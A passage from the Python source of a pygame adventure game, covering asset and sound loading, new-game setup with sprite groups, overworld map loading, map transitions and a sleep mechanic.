pg.image.load(path.join(img_folder, 'mech_back_lights.png')).convert_alpha()\n self.clear_box_image = pg.image.load(path.join(img_folder, 'clear_box.png')).convert_alpha()\n self.black_box_image = pg.image.load(path.join(img_folder, 'black_box.png')).convert()\n self.dark_grey_box_image = pg.image.load(path.join(img_folder, 'dark_grey_box.png')).convert()\n self.grey_box_image = pg.image.load(path.join(img_folder, 'grey_box.png')).convert()\n self.start_icon_image = pg.image.load(path.join(img_folder, 'start_icon.png')).convert()\n self.right_arrow_image = pg.transform.scale(pg.image.load(path.join(img_folder, 'right_arrow.png')).convert(), (ICON_SIZE, ICON_SIZE))\n self.back_arrow_image = pg.transform.scale(pg.image.load(path.join(img_folder, 'back_arrow.png')).convert(), (ICON_SIZE, ICON_SIZE))\n self.trash_image = pg.image.load(path.join(img_folder, 'trash.png')).convert()\n self.book_images = []\n for i in range(0, 6):\n image = pg.image.load(path.join(book_animation_folder, 'book{}.png'.format(i))).convert()\n image = pg.transform.scale(image, (self.screen_width, self.screen_height))\n self.book_images.append(image)\n #self.rock_shadow_image = pg.image.load(path.join(img_folder, 'rock_shadow.png')).convert_alpha()\n self.invisible_image = pg.image.load(path.join(img_folder, 'invisible.png')).convert_alpha()\n # creates a dictionary of animal images. This is not in the settings file like the others because of the order it needs to import info.\n ANIMAL_IMAGES = {}\n for animal in ANIMAL_ANIMATIONS:\n temp_list = []\n number_of_files = len([name for name in os.listdir(animals_folder) if animal in name if os.path.isfile(os.path.join(animals_folder, name))])\n for i in range(1, number_of_files + 1):\n filename = animal + '{}.png'.format(i)\n temp_list.append(filename)\n ANIMAL_IMAGES[animal] = temp_list\n # Loads animal images\n self.animal_images = {}\n for kind in ANIMAL_IMAGES:\n temp_list = []\n for i, picture in enumerate(ANIMAL_IMAGES[kind]):\n img = pg.image.load(path.join(animals_folder, ANIMAL_IMAGES[kind][i])).convert_alpha()\n temp_list.append(img)\n self.animal_images[kind] = temp_list\n # associates the animation frames with the animal images\n self.animal_animations = {}\n for kind in ANIMAL_ANIMATIONS:\n temp_dict = {}\n for animation in ANIMAL_ANIMATIONS[kind]:\n temp_list = []\n for frame in ANIMAL_ANIMATIONS[kind][animation]:\n temp_list.append(self.animal_images[kind][frame - 1])\n temp_dict[animation] = temp_list\n self.animal_animations[kind] = temp_dict\n self.bullet_images = {}\n for x, size in enumerate(BULLET_SIZES):\n for i, item in enumerate(BULLET_IMAGES):\n bullet_img = pg.image.load(path.join(bullets_folder, BULLET_IMAGES[i])).convert_alpha()\n if size != 'ar':\n if i != 0:\n img = pg.transform.scale(bullet_img, (3*(x + 1), 2*(x + 1)))\n else:\n img = pg.transform.scale(bullet_img, (6 * (x + 1), 2 * (x + 1)))\n else:\n img = pg.transform.scale(bullet_img, (40, 5))\n bullet_name = size + str(i)\n self.bullet_images[bullet_name] = img\n\n self.enchantment_images = []\n for i, item in enumerate(ENCHANTMENT_IMAGES):\n img = pg.image.load(path.join(enchantments_folder, ENCHANTMENT_IMAGES[i])).convert_alpha()\n self.enchantment_images.append(img)\n\n self.hair_images = {}\n for item in HAIR_IMAGES:\n img = pg.image.load(path.join(hair_folder, HAIR_IMAGES[item])).convert_alpha()\n self.hair_images[item] = img\n\n self.race_images = {}\n for item in RACE_IMAGES:\n img = pg.image.load(path.join(race_folder, RACE_IMAGES[item])).convert_alpha()\n self.race_images[item] = img\n\n self.item_images = {}\n for item in NEW_ITEM_IMAGES:\n img = pg.image.load(path.join(new_items_folder, NEW_ITEM_IMAGES[item])).convert_alpha()\n self.item_images[item] = img\n\n self.workstation_images = {}\n for item in WORKSTATION_IMAGES:\n img = pg.image.load(path.join(workstations_folder, WORKSTATION_IMAGES[item])).convert_alpha()\n self.workstation_images[item] = img\n\n \"\"\"\n self.weapon_images = []\n for i, weapon in enumerate(WEAPON_IMAGES):\n img = pg.image.load(path.join(weapons_folder, WEAPON_IMAGES[i])).convert_alpha()\n self.weapon_images.append(img)\n self.hat_images = []\n for i, hat in enumerate(HAT_IMAGES):\n img = pg.image.load(path.join(hats_folder, HAT_IMAGES[i])).convert_alpha()\n self.hat_images.append(img)\n self.top_images = []\n for i, top in enumerate(TOP_IMAGES):\n img = pg.image.load(path.join(tops_folder, TOP_IMAGES[i])).convert_alpha()\n self.top_images.append(img)\n self.bottom_images = []\n for i, bottom in enumerate(BOTTOM_IMAGES):\n img = pg.image.load(path.join(bottoms_folder, BOTTOM_IMAGES[i])).convert_alpha()\n self.bottom_images.append(img)\n self.shoe_images = []\n for i, shoe in enumerate(SHOE_IMAGES):\n img = pg.image.load(path.join(shoes_folder, SHOE_IMAGES[i])).convert_alpha()\n self.shoe_images.append(img)\n self.glove_images = []\n for i, glove in enumerate(GLOVE_IMAGES):\n img = pg.image.load(path.join(gloves_folder, GLOVE_IMAGES[i])).convert_alpha()\n self.glove_images.append(img)\"\"\"\n\n self.light_mask_images = []\n for i, val in enumerate(LIGHT_MASK_IMAGES):\n img = pg.image.load(path.join(light_masks_folder, LIGHT_MASK_IMAGES[i])).convert_alpha()\n self.light_mask_images.append(img)\n\n # Prescaling of lights\n self.flame_light_mask = pg.transform.scale(self.light_mask_images[1], (FLAME_TILE_BRIGHTNESS, FLAME_TILE_BRIGHTNESS))\n self.flame_light_mask_rect = self.flame_light_mask.get_rect()\n self.coals_light_mask = pg.transform.scale(self.light_mask_images[0], (FLAME_TILE_BRIGHTNESS, FLAME_TILE_BRIGHTNESS))\n self.coals_light_mask_rect = self.coals_light_mask.get_rect()\n self.candle_light_mask = pg.transform.scale(self.light_mask_images[1], (CANDLE_BRIGHTNESS, CANDLE_BRIGHTNESS))\n self.candle_light_mask_rect = self.candle_light_mask.get_rect()\n\n self.flashlight_masks = []\n temp_img = pg.transform.scale(self.light_mask_images[3], (int(300 * 2.8), 300))\n for rot in range(0, 120):\n new_image = pg.transform.rotate(temp_img, rot*3)\n self.flashlight_masks.append(new_image)\n\n self.magic_images = {}\n for item in MAGIC_IMAGES:\n img = pg.image.load(path.join(magic_folder, MAGIC_IMAGES[item])).convert_alpha()\n self.magic_images[item] = img\n\n self.magic_animation_images = {}\n for key, image in self.magic_images.items():\n image_list = []\n # enlarge image animation\n for i in range(0, 5):\n new_image = pg.transform.scale(image, (13*i, 13*i))\n image_list.append(new_image)\n # shrink animation\n for i in range(1, 10):\n new_image = pg.transform.scale(image, (int(70/i), int(70/i)))\n image_list.append(new_image)\n self.magic_animation_images[key] = image_list\n\n self.gender_images = []\n for i, gender in enumerate(GENDER_IMAGES):\n img = pg.image.load(path.join(gender_folder, GENDER_IMAGES[i])).convert_alpha()\n self.gender_images.append(img)\n self.corpse_images = []\n for i, corpse in enumerate(CORPSE_IMAGES):\n img = pg.image.load(path.join(corpse_folder, CORPSE_IMAGES[i])).convert_alpha()\n self.corpse_images.append(img)\n self.vehicle_images = []\n for i, x in enumerate(VEHICLES_IMAGES):\n img = pg.image.load(path.join(vehicles_folder, VEHICLES_IMAGES[i])).convert_alpha()\n self.vehicle_images.append(img)\n self.color_swatch_images = []\n for i, x in enumerate(COLOR_SWATCH_IMAGES):\n img = pg.image.load(path.join(color_swatches_folder, COLOR_SWATCH_IMAGES[i])).convert()\n self.color_swatch_images.append(img)\n self.fire_images = []\n for i, x in enumerate(FIRE_IMAGES):\n img = pg.image.load(path.join(fire_folder, FIRE_IMAGES[i])).convert_alpha()\n self.fire_images.append(img)\n self.shock_images = []\n for i, x in enumerate(SHOCK_IMAGES):\n img = pg.image.load(path.join(shock_folder, SHOCK_IMAGES[i])).convert_alpha()\n self.shock_images.append(img)\n self.electric_door_images = []\n for i, x in enumerate(ELECTRIC_DOOR_IMAGES):\n img = pg.image.load(path.join(electric_door_folder, ELECTRIC_DOOR_IMAGES[i])).convert_alpha()\n self.electric_door_images.append(img)\n self.loading_screen_images = []\n for i, screen in enumerate(LOADING_SCREEN_IMAGES):\n img = pg.image.load(path.join(loading_screen_folder, LOADING_SCREEN_IMAGES[i])).convert()\n img = pg.transform.scale(img, (self.screen_width, self.screen_height))\n self.loading_screen_images.append(img)\n self.tree_images = {}\n self.breakable_images = {}\n for kind in BREAKABLE_IMAGES:\n temp_list = []\n for i, picture in enumerate(BREAKABLE_IMAGES[kind]):\n img = pg.image.load(path.join(breakable_folder, BREAKABLE_IMAGES[kind][i])).convert_alpha()\n temp_list.append(img)\n self.breakable_images[kind] = temp_list\n for kind in TREES:\n temp_list = []\n temp_list2 = []\n temp_list3 = []\n for i, picture in enumerate(TREE_IMAGES[kind]):\n img = pg.image.load(path.join(tree_folder, TREE_IMAGES[kind][i])).convert_alpha()\n scaled_image = pg.transform.scale(img, (TREE_SIZES['small'], TREE_SIZES['small']))\n temp_list.append(scaled_image)\n scaled_image = pg.transform.scale(img, (TREE_SIZES['medium'], TREE_SIZES['medium']))\n temp_list2.append(scaled_image)\n scaled_image = pg.transform.scale(img, (TREE_SIZES['large'], TREE_SIZES['large']))\n temp_list3.append(scaled_image)\n self.tree_images['small ' + kind] = temp_list\n self.tree_images['medium ' + kind] = temp_list2\n self.tree_images['large ' + kind] = temp_list3\n\n self.portal_sheet = pg.image.load(PORTAL_SHEET).convert_alpha()\n self.portal_images = load_spritesheet(self.portal_sheet, 256)\n\n self.fireball_images = []\n for i, x in enumerate(FIREBALL_IMAGES):\n img = pg.image.load(path.join(fireball_folder, FIREBALL_IMAGES[i])).convert_alpha()\n self.fireball_images.append(img)\n self.explosion_images = []\n for i, x in enumerate(EXPLOSION_IMAGES):\n img = pg.image.load(path.join(explosion_folder, EXPLOSION_IMAGES[i])).convert_alpha()\n self.explosion_images.append(img)\n\n self.humanoid_images = {}\n for kind in HUMANOID_IMAGES:\n temp_list = []\n for i, picture in enumerate(HUMANOID_IMAGES[kind]):\n temp_folder = kind.replace('images', 'parts_folder')\n img = pg.image.load(path.join(eval(temp_folder), HUMANOID_IMAGES[kind][i])).convert_alpha()\n temp_list.append(img)\n self.humanoid_images[kind] = temp_list\n\n self.gun_flashes = []\n for img in MUZZLE_FLASHES:\n self.gun_flashes.append(pg.image.load(path.join(img_folder, img)).convert_alpha())\n # lighting effect\n self.fog = pg.Surface((self.screen_width, self.screen_height))\n self.fog.fill(NIGHT_COLOR)\n # Sound loading\n self.effects_sounds = {}\n for key in EFFECTS_SOUNDS:\n self.effects_sounds[key] = pg.mixer.Sound(path.join(snd_folder, EFFECTS_SOUNDS[key]))\n self.weapon_sounds = {}\n for weapon in WEAPON_SOUNDS:\n self.weapon_sounds[weapon] = []\n for snd in WEAPON_SOUNDS[weapon]:\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.3)\n self.weapon_sounds[weapon].append(s)\n self.weapon_hit_sounds = {}\n for weapon in WEAPON_HIT_SOUNDS:\n self.weapon_hit_sounds[weapon] = []\n for snd in WEAPON_HIT_SOUNDS[weapon]:\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.3)\n self.weapon_hit_sounds[weapon].append(s)\n self.weapon_reload_sounds = {}\n for weapon, snd in WEAPON_RELOAD_SOUNDS.items():\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.3)\n self.weapon_reload_sounds[weapon] = s\n self.zombie_moan_sounds = []\n for snd in ZOMBIE_MOAN_SOUNDS:\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.2)\n self.zombie_moan_sounds.append(s)\n self.wraith_sounds = []\n for snd in WRAITH_SOUNDS:\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.2)\n self.wraith_sounds.append(s)\n self.punch_sounds = []\n for snd in PUNCH_SOUNDS:\n s = pg.mixer.Sound(path.join(snd_folder, snd))\n s.set_volume(0.2)\n self.punch_sounds.append(s)\n self.male_player_hit_sounds = []\n for snd in MALE_PLAYER_HIT_SOUNDS:\n self.male_player_hit_sounds.append(pg.mixer.Sound(path.join(snd_folder, snd)))\n self.female_player_hit_sounds = []\n for snd in FEMALE_PLAYER_HIT_SOUNDS:\n self.female_player_hit_sounds.append(pg.mixer.Sound(path.join(snd_folder, snd)))\n self.zombie_hit_sounds = []\n for snd in ZOMBIE_HIT_SOUNDS:\n self.zombie_hit_sounds.append(pg.mixer.Sound(path.join(snd_folder, snd)))\n self.lock_picking_sounds = []\n for snd in LOCK_PICKING_SOUNDS:\n self.lock_picking_sounds.append(pg.mixer.Sound(path.join(snd_folder, snd)))\n\n def new(self):\n pg.mixer.music.load(path.join(music_folder, TITLE_MUSIC))\n pg.mixer.music.play(loops=-1)\n title_image = pg.image.load(path.join(img_folder, TITLE_IMAGE)).convert()\n title_image = pg.transform.scale(title_image, (self.screen_width, self.screen_height))\n self.map = None\n self.continued_game = False\n waiting = True\n i = 0\n while waiting:\n self.clock.tick(FPS)\n self.screen.fill(BLACK)\n title_image.set_alpha(i)\n self.screen.blit(title_image, (0, 0))\n if i > 240:\n self.draw_text('Press any key to start your adventure.', self.script_font, 18, WHITE, self.screen_width / 2, int(self.screen_height * 0.85),\n align=\"center\")\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n sys.exit()\n if event.type == pg.MOUSEBUTTONDOWN:\n waiting = False\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_n: # Enters the NPC creation tool\n if event.mod & pg.KMOD_CTRL:\n pass # I removed this but will add it again later.\n else:\n waiting = False\n\n elif event.key != pg.K_n:\n if not event.mod & pg.KMOD_CTRL:\n waiting = False\n\n pg.display.flip()\n i += 1\n if i > 255:\n i = 255\n\n # initialize all variables and do all the setup for a new game\n\n # Used for controlling day and night\n self.darkness = 0\n self.dark_color = (255, 255, 255)\n self.time_of_day = 0\n self.nightfall = False\n self.sunrise = False\n self.night = False\n self.last_darkness_change = 0\n self.day_start_time = pg.time.get_ticks()\n\n self.map_sprite_data_list = []\n self._player_inside = False\n self.compass_rot = 0\n self.people = PEOPLE\n self.animals_dict = ANIMALS\n self.saved_vehicle = []\n self.saved_companions = []\n self.underworld = False\n self.quests = QUESTS\n self.key_map = KEY_MAP\n self.bg_music = BG_MUSIC\n self.previous_music = TITLE_MUSIC\n self.portal_location = vec(0, 0)\n self.portal_combo = ''\n self.guard_alerted = False\n self.hud_map = False\n self.hud_overmap = False\n\n self.message_text = True\n self.message = ''\n self.map_type = None\n self.ais = []\n self.group = PyscrollGroup(0) # 0 is the map base layer, but I set it later to self.map.map_layer.\n self.all_sprites = pg.sprite.LayeredUpdates() # Used for all non_static sprites\n self.all_static_sprites = pg.sprite.Group() # used for all static sprites\n self.inventory_hud_icons = pg.sprite.Group()\n self.sprites_on_screen = pg.sprite.Group()\n self.moving_targets = pg.sprite.Group() # Used for all moving things bullets interact with\n self.moving_targets_on_screen = pg.sprite.Group()\n self.mobs = pg.sprite.Group()\n self.mobs_on_screen = pg.sprite.Group()\n self.npc_bodies = pg.sprite.Group()\n self.npc_bodies_on_screen = pg.sprite.Group()\n self.npcs = pg.sprite.Group()\n self.npcs_on_screen = pg.sprite.Group()\n self.animals = pg.sprite.Group()\n self.animals_on_screen = pg.sprite.Group()\n self.fires = pg.sprite.Group()\n self.fires_on_screen = pg.sprite.Group()\n self.breakable = pg.sprite.Group()\n self.breakable_on_screen = pg.sprite.Group()\n self.corpses = pg.sprite.Group()\n self.corpses_on_screen = pg.sprite.Group()\n self.dropped_items = pg.sprite.Group()\n self.dropped_items_on_screen = pg.sprite.Group()\n self.obstacles = pg.sprite.Group()\n self.obstacles_on_screen = pg.sprite.Group()\n self.walls = pg.sprite.Group()\n self.walls_on_screen = pg.sprite.Group()\n self.barriers = pg.sprite.Group()\n self.barriers_on_screen = pg.sprite.Group()\n self.elevations = pg.sprite.Group()\n self.elevations_on_screen = pg.sprite.Group()\n self.inside = pg.sprite.Group()\n self.inside_on_screen = pg.sprite.Group()\n self.climbs = pg.sprite.Group()\n self.climbs_on_screen = pg.sprite.Group()\n self.vehicles = pg.sprite.Group()\n self.vehicles_on_screen = pg.sprite.Group()\n self.lights = pg.sprite.Group()\n self.lights_on_screen = pg.sprite.Group()\n\n self.aipaths = pg.sprite.Group()\n self.firepots = pg.sprite.Group()\n self.arrows = pg.sprite.Group()\n self.chargers = pg.sprite.Group()\n self.mechsuits = pg.sprite.Group()\n self.detectors = pg.sprite.Group()\n self.detectables = pg.sprite.Group()\n self.portals = pg.sprite.Group()\n self.door_walls = pg.sprite.Group()\n self.nospawn = pg.sprite.Group()\n self.doors = pg.sprite.Group()\n self.player_group = pg.sprite.Group()\n self.players = pg.sprite.Group()\n self.grabable_animals = pg.sprite.Group()\n self.explosions = pg.sprite.Group()\n self.shocks = pg.sprite.Group()\n self.fireballs = pg.sprite.Group()\n self.firepits = pg.sprite.Group()\n self.containers = pg.sprite.Group()\n self.bullets = pg.sprite.Group()\n self.enemy_bullets = pg.sprite.Group()\n self.enemy_fireballs = pg.sprite.Group()\n self.work_stations = pg.sprite.Group()\n self.climbables_and_jumpables = pg.sprite.Group()\n self.all_vehicles = pg.sprite.Group()\n self.companions = pg.sprite.Group()\n self.companion_bodies = pg.sprite.Group()\n self.boats = pg.sprite.Group()\n self.amphibious_vehicles = pg.sprite.Group()\n self.flying_vehicles = pg.sprite.Group()\n self.land_vehicles = pg.sprite.Group()\n self.turrets = pg.sprite.Group()\n self.occupied_vehicles = pg.sprite.Group()\n self.random_targets = pg.sprite.Group()\n self.clicked_sprites = []\n self.target_list = [self.random_targets, self.moving_targets, self.aipaths]\n self.new_game = True\n self.respawn = False\n self.previous_map = \"1.tmx\"\n self.world_location = vec(1, 1)\n self.underworld_sprite_data_dict = {}\n self.player = Player(self) # Creates initial player object\n self.continued_game = False\n if self.new_game: # Why do I have to variables: new_game and conitnued_game\n self.character_menu = MainMenu(self, self.player, 'Character')\n if not self.continued_game:\n self.overworld_map = START_WORLD\n self.load_over_map(self.overworld_map) # Loads world map for first world. This will allow me to load other world maps later.\n self.change_map(None, RACE[self.player.equipped['race']]['start map'], RACE[self.player.equipped['race']]['start pos'])\n self.fly_menu = None\n self.in_menu = False\n self.in_lock_menu = False\n self.in_dialogue_menu = False\n self.dialogue_menu = None\n self.dialogue_menu_npc = None\n self.last_hud_update = 0\n self.last_fire = 0\n self.last_dialogue = 0\n self.hud_health_stats = self.player.stats\n self.hud_health = self.hud_health_stats['health'] / self.hud_health_stats['max health']\n self.hud_stamina = self.hud_health_stats['stamina'] / self.hud_health_stats['max stamina']\n self.hud_magica = self.hud_health_stats['magica'] / self.hud_health_stats['max magica']\n self.hud_mobhp = 0\n self.selected_hud_item = None\n self.show_mobhp = False\n self.last_mobhp_update = 0\n self.hud_hunger = 1\n self.hud_ammo1 = ''\n self.hud_ammo2 = ''\n self.draw_debug = False\n self.paused = False\n self.effects_sounds['level_start'].play()\n\n @property\n def portal_combo(self): # This is the method that is called whenever you access portal_combo\n return self._portal_combo\n @portal_combo.setter # Runs whenever you set a value for portal_combo, it checks portal combos\n def portal_combo(self, value):\n self._portal_combo = value\n if value != '':\n if value in PORTAL_CODES:\n coordinate = vec(PORTAL_CODES[value][0], PORTAL_CODES[value][1])\n location = vec(PORTAL_CODES[value][2], PORTAL_CODES[value][3])\n self.portal_combo = ''\n Portal(self, self.portal_location, coordinate, location)\n @property\n def player_inside(self): #This is the method that is called whenever you access\n return self._player_inside\n @player_inside.setter #This is the method that is called whenever you set a value\n def player_inside(self, value):\n if value!=self._player_inside:\n self._player_inside = value\n self.map.toggle_visible_layers()\n else:\n pass\n\n def load_over_map(self, overmap):\n # Loads data from overworld tmx file\n file = open(path.join(map_folder, overmap), \"r\")\n map_data = file.readlines()\n self.overworld_map = overmap\n self.map_data_list = []\n for row in map_data:\n if '<' not in row: # Ignores all tags in tmx file\n row = row.replace(',\\n', '') #gets rid of commas at the the end\n row = row.replace(' ', '') #gets rid of spaces between entries\n row = row.replace('\\n', '') #gets rid of new lines\n row = row.split(',')\n row = list(map(int, row)) # Converts from list of strings strings to integers\n self.map_data_list.append(row)\n self.world_width = len(self.map_data_list[0])\n self.world_height = len(self.map_data_list)\n\n # This creates a map data object to store which sprites are on each map. This keeps track of where sprites are when they more around or when you drop things.\n if self.map_sprite_data_list == []:\n for x in range(0, self.world_width):\n row = []\n for y in range(0, self.world_height):\n row.append(None)\n self.map_sprite_data_list.append(row)\n\n #world_mini_map = WorldMiniMap(self, self.map_data_list) # Only uncomment this to create a new overworld map if you edit the old one. Otherwise it will take literally forever to load every time.\n #self.load_map(str(self.map_data_list[int(self.world_location.y)][int(self.world_location.x)]) + '.tmx')\n\n \"\"\"\n def in_surrounding_tiles(self, x, y, num, layer):\n if (x < self.map.tiles_wide-1) and (y < self.map.tiles_high-1):\n if 0 not in [x, y]:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y + 1, layer), self.map.tmxdata.get_tile_gid(x - 1, y - 1, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer), self.map.tmxdata.get_tile_gid(x - 1, y + 1, layer), self.map.tmxdata.get_tile_gid(x + 1, y - 1, layer)]\n elif x == 0 and y != 0:\n return num in [self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer), self.map.tmxdata.get_tile_gid(x + 1, y - 1, layer)]\n elif x != 0 and y == 0:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x - 1, y + 1, layer)]\n else:\n return num in [self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer)]\n elif (x == self.map.tiles_wide-1) and (y == self.map.tiles_high-1):\n if 0 not in [x, y]:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x - 1, y - 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer)]\n elif x == 0 and y != 0:\n return num in [self.map.tmxdata.get_tile_gid(x, y - 1, layer)]\n elif x != 0 and y == 0:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer)]\n elif (x == self.map.tiles_wide-1) and (y != self.map.tiles_high-1):\n if 0 not in [x, y]:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x - 1, y - 1, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer), self.map.tmxdata.get_tile_gid(x - 1, y + 1, layer)]\n elif x == 0 and y != 0:\n return num in [self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer)]\n elif x != 0 and y == 0:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x, y + 1, layer), self.map.tmxdata.get_tile_gid(x - 1, y + 1, layer)]\n else:\n return num in [self.map.tmxdata.get_tile_gid(x, y + 1, layer)]\n elif (x != self.map.tiles_wide-1) and (y == self.map.tiles_high-1):\n if 0 not in [x, y]:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x - 1, y - 1, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer),\n self.map.tmxdata.get_tile_gid(x + 1, y - 1, layer)]\n elif x == 0 and y != 0:\n return num in [self.map.tmxdata.get_tile_gid(x + 1, y, layer), self.map.tmxdata.get_tile_gid(x, y - 1, layer), self.map.tmxdata.get_tile_gid(x + 1, y - 1, layer)]\n elif x != 0 and y == 0:\n return num in [self.map.tmxdata.get_tile_gid(x - 1, y, layer), self.map.tmxdata.get_tile_gid(x + 1, y, layer)]\n else:\n return num in [self.map.tmxdata.get_tile_gid(x + 1, y, layer)]\"\"\"\n\n def on_map(self, sprite):\n offset = 0\n if sprite['location'].x <= 0:\n sprite['location'].x = self.map.width - offset\n return [False, -1, 0]\n if sprite['location'].y <= 0:\n sprite['location'].y = self.map.height - offset\n return [False, 0, -1]\n if sprite['location'].x >= self.map.width:\n sprite['location'].x = offset\n return [False, 1, 0]\n if sprite['location'].y >= self.map.height:\n sprite['location'].y = offset\n return [False, 0, 1]\n return [True, 0, 0]\n\n # Used for switching to the next map after you go north, south, east or west at the end of the current map.\n def change_map(self, cardinal = None, coordinate = None, location = None, undermap = None):\n self.save_sprite_locs()\n # This for loop moves npcs and animals to other maps when they go off the screen.\n if not self.underworld and self.map:\n for npc in self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].npcs:\n temp_loc = self.on_map(npc)\n if not temp_loc[0]:\n if self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].visited:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].npcs.append(npc)\n else:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].moved_npcs.append(npc)\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].npcs.remove(npc)\n for animal in self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].animals:\n temp_loc = self.on_map(animal)\n if not temp_loc[0]:\n if self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].visited:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].animals.append(animal)\n else:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].moved_animals.append(animal)\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].animals.remove(animal)\n for vehicle in self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].vehicles:\n temp_loc = self.on_map(vehicle)\n if not temp_loc[0]:\n if self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].visited:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].vehicles.append(vehicle)\n else:\n self.map_sprite_data_list[int(self.world_location.x) + temp_loc[1]][int(self.world_location.y) + temp_loc[2]].moved_vehicles.append(vehicle)\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].vehicles.remove(vehicle)\n\n self.guard_alerted = False # Makes it so guards stop attacking you after you change maps\n self.player.vel = vec(0, 0)\n self.player.acc = vec(0, 0)\n direction = cardinal\n offset = 64\n if cardinal:\n if direction == 'north':\n self.world_location -= vec(0, 1)\n self.player.rect.top = self.map.height - offset\n self.player.pos = vec(self.player.rect.center)\n elif direction == 'south':\n self.world_location += vec(0, 1)\n self.player.rect.bottom = offset\n self.player.pos = vec(self.player.rect.center)\n elif direction == 'east':\n self.world_location += vec(1, 0)\n self.player.rect.right = offset\n self.player.pos = vec(self.player.rect.center)\n elif direction == 'west':\n self.world_location -= vec(1, 0)\n self.player.rect.left = self.map.width - offset\n self.player.pos = vec(self.player.rect.center)\n # This part of the code wraps around creating a globe like world\n if self.world_location.x == self.world_width:\n self.world_location.x = 0\n if self.world_location.x < 0:\n self.world_location.x = self.world_width - 1\n if self.world_location.y == self.world_height:\n self.world_location.y = 0\n if self.world_location.y < 0:\n self.world_location.y = self.world_height - 1\n\n if coordinate:\n # Sets player's location of world map\n self.world_location = vec(coordinate)\n # Sets player's location on local map\n loc = vec(location)\n self.player.rect.center = (int(loc.x * TILESIZE), int(loc.y * TILESIZE))\n self.player.pos = vec(self.player.rect.center)\n if undermap == None:\n selected_map = str(self.map_data_list[int(self.world_location.y)][int(self.world_location.x)] - 1) + '.tmx'\n else:\n selected_map = undermap\n\n # This block of code sets the positions of the player's followers so they are randomly arranged in a circular orientation around the player.\n for companion in self.companions:\n rand_angle = randrange(0, 360)\n random_vec = vec(170, 0).rotate(-rand_angle)\n companion.rect.center = self.player.rect.center + random_vec\n companion.pos = vec(companion.rect.center)\n companion.offensive = False\n companion.map = selected_map\n self.load_map(selected_map)\n\n def make_work_station_menu(self, station_type, inventory):\n station = WORK_STATION_DICT[station_type]\n MainMenu(self, self.player, station, inventory)\n\n def make_lock_menu(self, lock):\n self.lock_menu = Lock_Menu(self, lock)\n\n def sleep_in_bed(self):\n self.screen.fill(BLACK)\n pg.mixer.music.stop()\n self.draw_text('Sweet dreams....', self.script_font, 25, WHITE, self.screen_width / 2, self.screen_height / 2, align=\"topright\")\n pg.display.flip()\n self.player.add_health(50)\n self.player.add_stamina(50)\n self.player.add_magica(50)\n self.effects_sounds['snore'].play()\n sleep(10)\n self.beg = perf_counter() # resets dt\n pg.mixer.music.play(loops=-1)\n # Changes it to sunrise when you sleep.\n self.darkness = 225\n color_val = 255 - self.darkness\n self.dark_color = (color_val, color_val, color_val)\n self.night = True\n self.day_start_time = pg.time.get_ticks() - NIGHT_LENGTH\n\n def garbage_collect(self): # This block of code removes everything in memory from previous maps\n for sprite in self.all_sprites:\n if self.player.possessing:\n if sprite in [self.player.possessing, self.player.possessing.body]:\n continue\n if self.player.in_vehicle:\n if sprite in [self.player.vehicle]:\n continue\n if sprite in self.companions:\n continue\n elif sprite in self.companion_bodies:\n continue\n elif sprite in [self.player, self.player.human_body, self.player.dragon_body, self.player.body]:\n continue\n else:\n sprite.kill()\n del sprite\n for sprite in self.turrets:\n if not sprite.mother.alive():\n 